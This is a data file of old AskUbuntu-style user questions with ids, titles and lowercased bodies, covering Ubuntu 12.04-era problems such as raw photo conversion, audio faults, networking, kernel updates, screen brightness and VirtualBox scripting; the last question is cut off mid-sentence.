194973	is there a quick way to convert camera raw files to dng ?	before i switched from windows to ubuntu for my daily computing , i used adobe 's photoshop lightroom for processing photos from my dslr . adobe made it really straightforward to batch convert from proprietary camera raw files ( in my case , .nef ) to dng . i have n't found any way to convert nef to dng in ubuntu yet . most photography programs do process nefs to jpg/tiff/png/etc. , but i 'm looking for a converter for archival purposes . are there any tools available , either standalone or built into another app , that can losslessly batch convert from nef to dng ? edit : fabricator4 answered the question , but i have since realized that the question itself might not be a good one . there are a few problems with the dng format that do n't necessarily show up in a purely adobe workflow , but become noticeable when working in a foss workflow .
194975	changing disk allocation for ubuntu on dual-boot system	when i first installed ubuntu , i had a new pc with windows 7 installed . it was my first installation of ubuntu so i only allocated 45 % of the disk for ubuntu . now i find that i have been using ubuntu exclusively so i would like to change the allocation of the disk so ubuntu has say 75 % of the disk and win . 7 25 % . is there a way to do this without reformatting the disk . i am using ubuntu 11.10 with gnome . thanks , peter
194977	music manager that can properly see id3 ratings tags and synchronize with android	i 'm moving from windows 7 to ubuntu , and so far the experience has been a really good one : ) however , there is something that i 've used to do with windows 7 that i ca n't find how to do in ubuntu : from my windows music manager programs ( either mediamonkey or windows media player ) i could set song ratings in a way that the ratings set from either program could be also read from the other one . additionally , song ratings were visible and updated in my ipod touch when i synch'ed my music ( either manually or using itunes ) . to sum up , it seems that mediamonkey , wmp , and the ipod device use standard mp3 metadata tag for ratings . now , using ubuntu 12.04 , and now with an android device : rhythmbox ca n't see the song rates , despite those ratings can be seen by mediamonkey and ms music player when i boot with win7 . is this an issue i can fix with some setting ? is there any program i can use to accomplish this ? what do you recommend to sync my music with android ( 4.0 , galaxy s2 ) , also keeping the song ratings information updated between android and my pc ? thanks ! !
194978	installarchives ( ) failed : perl : warning : setting locale failed .	i get the following error while updating ubuntu 12.04 lts installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 430284 files and directories currently installed . ) preparing to replace libxml2-dev 2.7.8.dfsg-5.1ubuntu4.1 ( using ... /libxml2-dev_2.7.8.dfsg-5.1ubuntu4.2_i386.deb ) ... unpacking replacement libxml2-dev ... preparing to replace libxml2 2.7.8.dfsg-5.1ubuntu4.1 ( using ... /libxml2_2.7.8.dfsg-5.1ubuntu4.2_i386.deb ) ... unpacking replacement libxml2 ... preparing to replace gstreamer0.10-plugins-bad 0.10.22.3-2ubuntu2 ( using ... /gstreamer0.10-plugins-bad_0.10.22.3-2ubuntu2.1_i386.deb ) ... unpacking replacement gstreamer0.10-plugins-bad ... preparing to replace libgstreamer-plugins-bad0.10-0 0.10.22.3-2ubuntu2 ( using ... /libgstreamer-plugins-bad0.10-0_0.10.22.3-2ubuntu2.1_i386.deb ) ... unpacking replacement libgstreamer-plugins-bad0.10-0 ... preparing to replace ubuntu-keyring 2011.11.21 ( using ... /ubuntu-keyring_2011.11.21.1_all.deb ) ... /var/lib/dpkg/info/samba4.postinst : 14 : /var/lib/dpkg/info/samba4.postinst : /usr/share/samba/setoption.pl : permission denied dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 126
194981	how do i install gnome-shell-extensions package in ubuntu quantal	im looking for a way to install the user-theme extension in ubuntu quantal with gnome 3.6 and from my understanding you need to install the gnome-shell-extensions package . i 'm unable to find any compatible version of this anywhere thats not going to give me dependency errors or broke my system . if anyone knows how to help me out , could you please let me know .
194983	how to clear kubuntu notifications	hi i have got kde as my de , everything is good . but i am getting problem with notifications that are appearing with bottom right corner . i have n't found any way to clear them all with one-click , no option like clear all or so . i got many notifications , so is there any way to clear all notifications at a time . thank you .
194984	how do i fix the audio on my laptop . model fujitsu b6220	i reinstalled ubuntu 12.04 on my laptop because the unity desktop was freezing . reinstalling 12.04 seems to have fixed the freezing problem , but now the audio does not work . when i go to settings > audio and under the output tab it only has the option for digital output . there is no option for analog output . the sound card show up under lspci as : '' 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) '' what would be the command to reinstall the audio subsystem ? if that would fix it ...
194986	does using terminal-based text browsers provide significant improvements in browsing speed ?	i am using ubuntu 12.04 . i know two methods to access the web-pages through terminal . they are lynx and elinks . when i tried to use them to access web-pages from terminal , i did n't seem to get any improvements on browsing speed . i am not sure whether it 's just normal or my internet speed is slow . so what is the best way to access the web-page ? through terminal browsers or gui browsers ? and what are the benefits and limitations of using text based terminal browsers ?
194994	unable to connect to 127.0.0.1 using telnet	i have a new ubuntu install where i am not able to connect to localhost or 127.0.0.1 or using my computer name . telnet localhost [ tried all/no port numbers ] returns telnet : unable to connect to remote host : connection refused is there any configuration i need to do to make this work ? would it be disabled by default ? ?
194995	ubuntu 12.10 beta2 on thinkpad t60	i have a thinkpad t60 installed with windows 7 and ubuntu 12.04 without any problem . however , after i upgraded ubuntu 12.04 to 12.10 ( beta2 ) i found my windows 7 was missing in the grub menu . i also tried fresh installation for ubuntu 12.10 beta2 several times ( with and without partition but the result was same ( it was also very strange that the restart does n't work ) . i also noticed that the installer ( i burned a live dvd ) could not detect windows 7 . finally i decided to re-install 12.04 and windows 7 came back again . could anybody please tell me what might be the problem ?
194999	compressed mp3 files show in thunar but not in dolphin . why ?	this morning i tried to compress my mp3 files with lame and did that . but after that , whatever target name i give to the compressed files are not being listed in dolphin . however , these compressed files show up both in thunar and the terminal . see the attached screenshot :
195000	mouse arrow moving slowly using keyboard keys	my mouse is not working properly , so i enabled keyboard keys for moving mouse arrow using universal access > pointing and clicking > mouse keys `` on '' but mouse arrow moves very slow using keyboard keys . i want to move it in normal way as i move mouse , using keyboard keys ( numlock keys 2,4,6,8 ) . how to solve this ?
195001	ethernet and wifi not working	i recently dual installed linux next to windows 7 . everything worked fine for the first couple days . then i decided to upgrade from 11.10 to 12.04 . i think the installation got hung up at the end because when the computer rebooted it froze and i had to force a shutdown with the power button . after that things got strange . my wifi and ethernet have not been working , even when i select different versions of the kernel from the grub menu . it 's a hassle going between windows to get online and troubleshoot to revert back to linux to execute commands . today i tried reinstalling 11.10 over 12.04 , by selecting the ubuntu option to `` upgrade from 12.04 to 11.10 . still have the problem , but hopefully someone can help . it looks like wlan0 and eth0 are n't working . i ca n't see either wlan0 or eth0 ( only lo ) with just the normal `` ifconfig '' command . i am also unable to open the networking section under system settings . ifconfig -a eth0 link encap : ethernet hwaddr b8:70 : f4:2c:2b:9a broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr ac:81:12 : a4:7e : a3 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lspci | grep ether 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) sudo lshw -c net pci ( sysfs ) *-network disabled description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 01 serial : ac:81:12 : a4:7e : a3 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-26-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d6400000-d6403fff *-network disabled description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 02 serial : b8:70 : f4:2c:2b:9a size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a latency=0 link=no multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : d2410000-d2410fff memory : d2400000-d240ffff memory : d2420000-d243ffff an attempt to activate eth0 sudo lshw -enable eth0 *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 02 serial : b8:70 : f4:2c:2b:9a size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a latency=0 link=yes multicast=yes port=mii speed=100mbit/s do i need to download a different program to take over the networking in ubuntu if the default is n't working ? why would the fresh install ( keeping personal folders ) not solve the problem ?
195011	how do i adjust the screen brightness on an acer aspire one d270 ?	my system specifications are : ubuntu 12.04 , 64-bit , acer aspire one d270 , intel atom cpu the usual brightness increase/decrease key combination using fn key does n't work in ubuntu as many pointed out . i had found two solutions on this forum to set the screen brightness . one was to make the usual key combination work answer is given here : is there a way to set a hotkey to change screen brightness ? and the other is using the command sudo setpci -s `` 00:02.0 '' f4.b=20 where the 20 is a hexadecimal number representing brightness . it 's only the latter that worked in my case . i observe that the original brightness setting is restored after resumption from sleep mode . all i want is to keep my brightness setting permanent . how do i do that ? try 1 : tried alok 's suggestion . it just sits there as a startup application . does n't figure as an icon on the topbar of the screen , like the dropbox icon ( my dropbox account it is linked to ubuntu ) so that i can conveniently change the brightness . try 2 : also i must add , that the method system settings - > additional drivers gives an empty list . in my earlier install ( which i had to overwrite-reinstall : - ( ) , the list had ( i think ) intel cedarview graphics driver . so must i install before trying the methods in any of the answers below ? update : i read somewhere intel cedarview is only for 32-bit os ! try 3 : just tried the quiet_splash etc that i had to add to /etc/default/grub , even read the thread given in one of the answers below ! temporarily settled myself with this method : pasted the setpci brightness command in a bash file brightness.sh created a .desktop file for the command bash brightness.sh made it an executable file . try 4a : i created an environment variable bri ensured using env it 's there in the list , and tried using it , here 's the bash file brightness.sh # ! /bin/bash echo `` set brightness ( values 00-ff ) : `` read s sudo setpci -s `` 00:02.0 '' f4.b= $ s export bri=s however i have to give the administrative password , and have yet not succeeded in making it a permanent setting and am working on these aspects ! try 4b : i even tried ( in vain ) pasting the export bri into /etc/default/grub and /etc/grub.conf appending the same to ~/.bashrc and to /etc/bash.bashrc through the shell script brightness.sh that i made as i in each case restart and find bri to still have its old value , and not the one given by executing brightness.sh via the launcher !
195014	i ca n't update my ubuntu !	after upgrading to kernel 3.2.0-31-generic-pae my ubuntu machine does n't updates and shows some errors . also the update-notifier stays in my tray . i tried sudo apt-get install -f but it gave me the following output : balakrish @ balakrish : ~ $ sudo apt-get install -f [ sudo ] password for balakrish : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : lcdproc-extra-drivers libg15render1 libsdl-gfx1.2-4 libsvga1 libsdl-net1.2 libxosd2 libmikmod2 libzeitgeist0.8-cil libtaoframework-sdl1.2-cil libg15daemon-client1 libsdl-mixer1.2 libtaoframework-opengl3.0-cil lcdproc libnunit2.5-cil libsmpeg0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-3.2.0-31-generic linux-headers-3.2.0-31-generic-pae the following new packages will be installed : linux-headers-3.2.0-31-generic linux-headers-3.2.0-31-generic-pae 0 upgraded , 2 newly installed , 0 to remove and 55 not upgraded . 2 not fully installed or removed . need to get 0 b/1,958 kb of archives . after this operation , 22.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 513139 files and directories currently installed . ) unpacking linux-headers-3.2.0-31-generic ( from ... /linux-headers-3.2.0-31-generic_3.2.0-31.50_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-31-generic_3.2.0-31.50_i386.deb ( -- unpack ) : error creating directory `./usr/src/linux-headers-3.2.0-31-generic/include/config/comedi/usb ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking linux-headers-3.2.0-31-generic-pae ( from ... /linux-headers-3.2.0-31-generic-pae_3.2.0-31.50_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-31-generic-pae_3.2.0-31.50_i386.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-31-generic-pae/include/config/comedi/addi/apci/3001.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-31-generic-pae/include/config/comedi/addi/apci/3001.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-31-generic_3.2.0-31.50_i386.deb /var/cache/apt/archives/linux-headers-3.2.0-31-generic-pae_3.2.0-31.50_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) df gives this output : balakrish @ balakrish : ~ $ df -h filesystem size used avail use % mounted on /dev/sda15 35g 3.0g 30g 10 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 766m 876k 765m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 356k 1.9g 1 % /run/shm /dev/sda16 25g 20g 3.5g 86 % /home /dev/sda14 6.9g 5.0g 1.7g 76 % /usr /dev/sdb1 74g 31g 40g 44 % /media/miscellaneous /dev/sda7 120g 119g 1.2g 100 % /media/library /dev/sda12 100g 31g 70g 31 % /media/songs sudo fdisk -l gives this : balakrish @ balakrish : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002f59b device boot start end blocks id system /dev/sda1 * 63 125837144 62918541 7 hpfs/ntfs/exfat /dev/sda2 125837206 1953503999 913833397 f w95 ext 'd ( lba ) /dev/sda5 125837208 293603939 83883366 7 hpfs/ntfs/exfat /dev/sda6 293604003 461370734 83883366 7 hpfs/ntfs/exfat /dev/sda7 461370798 713028959 125829081 7 hpfs/ntfs/exfat /dev/sda8 713029023 808298602 47634790 7 hpfs/ntfs/exfat /dev/sda9 880795818 1132453979 125829081 7 hpfs/ntfs/exfat /dev/sda10 1132454043 1227834214 47690086 7 hpfs/ntfs/exfat /dev/sda11 1300220838 1447022744 73400953+ 7 hpfs/ntfs/exfat /dev/sda12 1447022808 1656735254 104856223+ 7 hpfs/ntfs/exfat /dev/sda13 1656735318 1953503999 148384341 7 hpfs/ntfs/exfat /dev/sda14 1285543936 1300219903 7337984 83 linux /dev/sda15 808300544 880795647 36247552 83 linux /dev/sda16 1227835392 1279238143 25701376 83 linux /dev/sda17 1279240192 1285537791 3148800 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00028680 device boot start end blocks id system /dev/sdb1 63 156301487 78150712+ 83 linux ls /usr/src output : balakrish @ balakrish : ~ $ ls /usr/src linux-headers-3.2.0-24 linux-headers-3.2.0-27-generic linux-headers-3.2.0-24-generic linux-headers-3.2.0-27-generic-pae linux-headers-3.2.0-24-generic-pae linux-headers-3.2.0-29 linux-headers-3.2.0-25 linux-headers-3.2.0-29-generic linux-headers-3.2.0-25-generic linux-headers-3.2.0-29-generic-pae linux-headers-3.2.0-25-generic-pae linux-headers-3.2.0-30 linux-headers-3.2.0-26 linux-headers-3.2.0-30-generic linux-headers-3.2.0-26-generic linux-headers-3.2.0-30-generic-pae linux-headers-3.2.0-26-generic-pae linux-headers-3.2.0-31 linux-headers-3.2.0-27 vboxhost-4.1.20
195026	what are the new features of gnome 3.6 ?	what are the new features included in gnome 3.6 ? can somebody brief the features that are worth trying out in new gnome . it will be great if you add the steps to install it . thanks
195029	how can i determine why sublime-text 2 will no longer start for me ?	my sublime-text 2 editor no longer starts when i click it 's icon in my dock . the icon does the normal slow pulsing for a while ( unity ) but nothing seems to load . how can i determine why sublime has started failing ? update output of $ cat /usr/share/applications/sublime-text-2.desktop # ! /usr/bin/env xdg-open [ desktop entry ] name=sublime text 2 genericname=text editor comment=sophisticated text editor for code , html and prose exec=/usr/bin/sublime-text-2 % f terminal=false type=application mimetype=text/plain ; text/x-chdr ; text/x-csrc ; text/x-c++hdr ; text/x-c++src ; text/x-java ; text/x-dsrc ; text/x-pascal ; text/x-perl ; text/x-python ; application/x-php ; application/x-httpd-php3 ; application/x-httpd-php4 ; application/x-httpd-php5 ; application/xml ; text/html ; text/css ; text/x-sql ; text/x-diff ; x-directory/normal ; inode/directory ; icon=sublime-text-2 categories=texteditor ; development ; utility ; name [ en_us ] =sublime text 2 x-ayatana-desktop-shortcuts=newwindow ; [ newwindow shortcut group ] name=open a new window exec=/usr/bin/sublime-text-2 -- new-window
195032	sound static in vlc ubuntu 12.04	when i set the audio output module to pulseaudio , audio memory , or open sound system , the sound works sometimes , but usually is very staticy . if i switch to alsa , the sound works fine , but if i pause the video , when i unpause it , there is no sound . i have to quit vlc and open it back up . any ideas how i could fix one of the other audio modules ? my google search seems to suggest this is a bug with older vlc versions . i have vlc 2.0.3 ( the packaged version that comes with this ubuntu version ) .
195037	is there a tool to split a book saved as a single pdf into one pdf per chapter ?	i have a few books as pdfs , and i 'd like to split them by chapter for easier consumption on a mobile phone . is there any tool ( or sequence of tools ) i can use to easily split the book into different pdf files by chapter ?
195041	can i install ubuntu/lubuntu on a pc with a video card that is not supported if i add `nomodeset` in using the live cd/usb ?	i have a computer with a video card that has no linux support . i discovered this issue while trying to use a persistent usb to boot from . i found that i can boot like that if i change options and edit so as to add nomodeset there ( see question and answer ) . also , editing the syslinux.cfg file from my live persistent usb and adding nomodeset in a line there made this setting automatic for booting from the persistent usb . can i make a similar edit for proper install from the same live usb ? is it possible to edit something on the live usb in order to install the so from it , -- that is : having automatically the nomodeset setting already there when the installation starts ? my problem is that in order to install i think i already have to have added nomodeset or i 'll see nothing on my display . i need a way to be sure that nomodeset it 's permanent from the start .
195045	ubuntu does n't appears in grub menu	my system is loaded with windows 7 and ubuntu 12.04 i reinstalled windows os and made my ubuntu stay as it is . but i am not able to view the options as if earlier to login to ubuntu . i am not able to find where ubuntu is located.even for login to ubuntu is also not visible . please help me to find ubuntu .
195047	how can i use a script to control a virtualbox guest ?	refer to : launch an application in windows from the ubuntu desktop i was wondering if takkat could elaborate on the actual execution i.e . howto in the script file . this will be greatly helpful . thanks in advance my script file internetexplorervm.sh looks like this , execution is /path/to/internetexplorervm.sh `` c : \program files\internet explorer\iexplore.exe '' # ! /bin/bash # start internet explorer inside of a windows7 ultimate vm echo `` starting 'internet explorer ' browser inside windows7 virtual machine '' echo `` '' sleep 1 echo `` please be patient '' vboxmanage startvm b307622e-6b5e-4e47-a427-84760cf2312b sleep 15 echo `` '' echo `` now starting 'internet explorer ' '' # # vboxmanage -- nologo guestcontrol b307622e-6b5e-4e47-a427-84760cf2312b execute -- image `` $ 1 '' -- username railroadguest -- password bnsf1234 vboxmanage -- nologo guestcontrol b307622e-6b5e-4e47-a427-84760cf2312b execute -- image `` c : \\program/ files\\internet/ explorer\\iexplore.exe '' -- username railroadguest -- password bnsf1234 -- wait-exit -- wait-stdout echo `` '' echo `` saving the vm 's state now '' vboxmanage controlvm b307622e-6b5e-4e47-a427-84760cf2312b savestate sleep 2 # check vm state echo `` '' echo `` check the vm state '' vboxmanage showvminfo b307622e-6b5e-4e47-a427-84760cf2312b | grep state exit my apologies for any mistakes , this is my first time posting on askubuntu.thanks a ton in advance . this has been very helpful . need this for bnsf guests , their mainframe emulator works exclusively on java enabled internet explorer .
195051	crackling and feedback with presonus audiobox usb on 12.04	i 'm using the presonus audiobox usb with the packaged microphone and headphones ( audiobox studio bundle with m7 high-definition condenser microphone and hd7 professional monitoring headphones ) . i get a lot of feedback and loud crackle in my headphones during audio playback after about 10-20 seconds . it seems to happen at points in songs where the music suddenly becomes louder or the bass becomes more prevalent . i checked connections and the same setup works fine in windows 7 . if there is any kind of tweaking i can do with my settings to fix this problem please let me know . thanks , md
195052	can you set up banshee visualisations without root privileges ?	you can add music visualisations to banshee easily by installing some extra packages via apt . can you do it without root privileges ?
195055	ubuntu 12.04 freeze on ctrl+alt+f1	i have radeon card connected over hdmi to my tv . to resolve bug with hdmi-sound , i switch between virtual terminal and gnome desktop each time the tv is switched on with ctrl+alt+f1 and after console appear with ctrl+alt+f7 . it 's ugly , but its worked for me . since yesterday i got system freezes on ctrl+alt+f1 - no reaction on keyboard , mouse pointer disappear at all , gnome desktop still displayed . probably has nothing to do with hdmi . any suggestion how to resolve it ?
195059	installed kubuntu-desktop over ubuntu and upgraded , what is the distribution now ?	i am curious to know how ubuntu will handle later updates if i install other *-desktop metapackages such as kubuntu-desktop , lubuntu-desktop etc on a default ubuntu installation . as dist-upgrade command upgrade the distribution , what will be my final distribution . this question is important because dist-upgrade can install and remove packages to satisfy dependencies , so it may remove some packages say for example , dependency of ubuntu-desktop to satisfy dependency of kubuntu-desktop
195064	installing ubuntu failed on asus laptop	i am trying to install ubuntu desktop 12.04 on my laptop . it just failed on the entry selection step ( to select installation or try it first ) . however , when i tried it on my desktop computer , the installation went smoothly . i 've thought of that and got a few clues . my desktop computer had window xp installed already , while my laptop has only got linux ( fedora 14 ) is there a laptop version of ubuntu ? and i just downloaded the wrong one ? thanks for any suggestion ! ps : my laptop is asus k42j , ram size is 2g . i am using liveusb to create the usb stick .
195068	can ubuntu recognize an external disk drive created by windows xp ?	i have an external hard drive formatted under windows xp , can i manage this drive in ubuntu 12.04 lts . right now the drive is invisible to ubuntu . how can i use such a drive without reformatting it ?
195069	unable to boot ubuntu with new kernel but it works fine with old kernel	i recently acquired a samsung series 9-900x3c and installed ubuntu 12.04 lts on it . now i wanted to upgrade to the most recent kernel and after grabbing the packages from `` kernel.ubuntu.com/~kernel-ppa/mainline/ '' and installing them via dpkg ubuntu fails to boot . i can select the appropriate kernel version in grub but when i try to launch the ubuntu with kernel 3.6 nothing happens . on the other hand kernel 3.2.x works fine for me . any suggestions what i can do to use the most recent kernel ?
195070	external display , windows are moving to external display	i use external display with lenovo w520 , i am running it with following script xrandr -- output lvds1 -- auto -- primary -- output virtual -- mode 1920x1200 -- left-of lvds1 optirun screenclone -d :8 -x 1 xrandr -- output virtual -- off but i have number of problems . all windows are moving on external display if i interrupt this script i can not run it second time without restarting xorg . yakuake is changing height and does not showing tabs . i can not make external display primary , in that case i can not see windows . yakuake is changing height and does not showing tabs . if you know how to solve thisw issues please let me know . thanks in advance !
195073	synaptic 'initialize ' , 'initialise ' - why the difference ?	british english is the language we oldies ( baby-boomers ) had to learn in australia , so 'initialise ' is correct . usa english has -ize , instead of -ise - so what language is synaptic using : british or usa ?
195076	libreoffice ca n't open a spreadsheet after lockup	i have been editing my-file.ods almost daily using libreoffice . today it hanged at one point . i had to reboot the laptop . now the file can not be edited . when it is opened for editing , a warning is issues : document file is locked for editing by unknown user . if i open the file for editing despite the stated hiccup and edit it and then try to save it , i am prompted to save it under another name . but i do n't want to change the name .
195077	ubuntu audio pitch shifting filter	i 'm currently developing a video player software which intended to be an embeedded player . i 'm using java with vlcj library for the video player . what i 'm looking is a way , something to transform the audio output to make the output sound as oldman or a kid ( pitch shifting , i guess is the name ) . vlc have this when enabling time stretch , but the video play speed is affected ( slower to get oldman sound , but fast-forward-alike to get kid voice effect . is there any solutions for this ? i do n't find this feature on vlc ( j ) , so i think what i need is the audio output of the ubuntu itself ( ubuntu 12.04 ) to do this job . something like filtering audio output system wide . any software or setting to do this ? it also need to be controllable via command line to provide realtime effect changing . thanks in advance .
195080	hotkeys do not work sometimes in ubuntu 12.04	i use ubuntu 12.04 with unity 2d and i 've stumbled upon this issue : sometimes shortcut keys stop working in some windows . for instance , i have these windows opened usually : google chrome , terminal , skype , pidgin . sometimes everything is ok and shortcuts work no matter what window i hit them from , however , hotkeys hit from skype ( more often ) or pidgin ( less often ) do not work , but they still work from terminal or google chrome . moreover , not all hotkeys are affected , the problem holds only for locking the computer ( ctrl + alt + l ) and other custom shortcuts like executing some command or launching a program ( i used zenity -- entry with [ super | ctrl ] + [ some letter : k , n , etc ] for testing ) . does anyone have a clue what is causing the problem and how to fix it ?
195085	how can i change the icon of a fogger app	i 've made several fogger apps ( without any code , so basically they 're just hyperlinks in the unity launcher ) . how can i change the icon of these 'apps ' ? ( do i , for example , need to make a stylesheet ? )
195088	desktop dims when thunderbird and firefox are launched	i am running ubuntu 12.04 ( almost default install regularly updated ) unity interface on asus x53u ( amd brazos dual core c60 with 2gb ram ) . on launching thunderbird and firefox , the application dims and the cursor changes to wait mode . in case of thunderbird , this is most pronounced with the wait time of up to a minute . memory status checked with free indicates around 500mb of free memory on such occasions . the os is stable and i can switch to a different work-space , etc . what could this be ? is this something normal ?
195089	desktop maximal slow after upgrade kubuntu from 10.04 to 12.04	the upgrade was started from panel and finished without errors . the textual modus runs well ( f1-f6 ) . the gui desktop runs about 1000 % slower , for example , to open then bash window ( terminal ) needs some minutes . running sudo apt-get install -- reinstall nvidia-current and sudo nvidia-xconfig did not helped . is the remove and new install of kde the possible way ?
195091	ubuntu 12.04 . crashing	i frequently get an error message that ubuntu 12.04 has experienced an internal error in apport-gpu-error-intel-py . it might be related to my screen that suspends itself after a long time of inactivity . no keyboard or mouse movement brings it back on again , only re-boot . power management suspension is off . any ideas ?
195092	what is the best bluetooth mouse that works out of the box with ubuntu 12.04 and have long battery life ?	what is the best bluetooth mouse that works out of the box with ubuntu 12.04 and have long battery life ? i have microsft 5000 and have problems with ubuntu 12.04 also its battery life is really bad . please recommend me your favorite one . it may also require simple configuration to make it work .
195094	how to suppress or disable the shutdown option from indicator menu or shutdown dialog ?	my goal is to allow user only to restart the system , and deny any shutdown ( suspend , hibernate ) . i am running unity-2d . i 've managed to deny suspend and hibernate with polkit policy files like explained in how to disable shutdown/reboot/suspend/hibernate ? i observed that is has somehow disable shutdown abilities , but has n't removed `` shutdown '' entry from the indicator panel menu neither as well as the `` shutdown ... '' button from the shutdown dialog . pressing shutdown button at this point restarts lightdm , returning to the login screen . my goal is to remove any `` shutdown '' action and button . so , i 've added an ovveride file in /usr/share/glib-2.0/schemas that contains some rules : [ com.canonical.indicator.session ] suppress-shutdown-menuitem = true ( all suppress-*-menuitem has `` false '' value by default in the schema ) compiling , restarting x , now there is an entry `` close session ... '' in the indicator panel menu ... : it 's not what i want . at this point , if i set another entry suppress-logout-menuitem to true i got no entry in the indicator panel menu . trying like this all combination does n't give the opportunity to remove `` shutdown '' references/buttons without removing restart option . all i want is to remove any reference to `` shutdown '' but keep a `` restart '' option somewhere in the indicator menu ... thanks ! update ! i still do n't have enough data to resolve my issue . the new data is an ubuntu maintainer ( https : //bugs.launchpad.net/ubuntu/+source/indicator-session/+bug/1015558 ) admits this as an issue that is resolved in 12.10 and is not going to be resolved in the lts branch ! from my point of view , this is cleary a regression as i did n't have any problem to do this in 10.04 . at this point , even if i manage 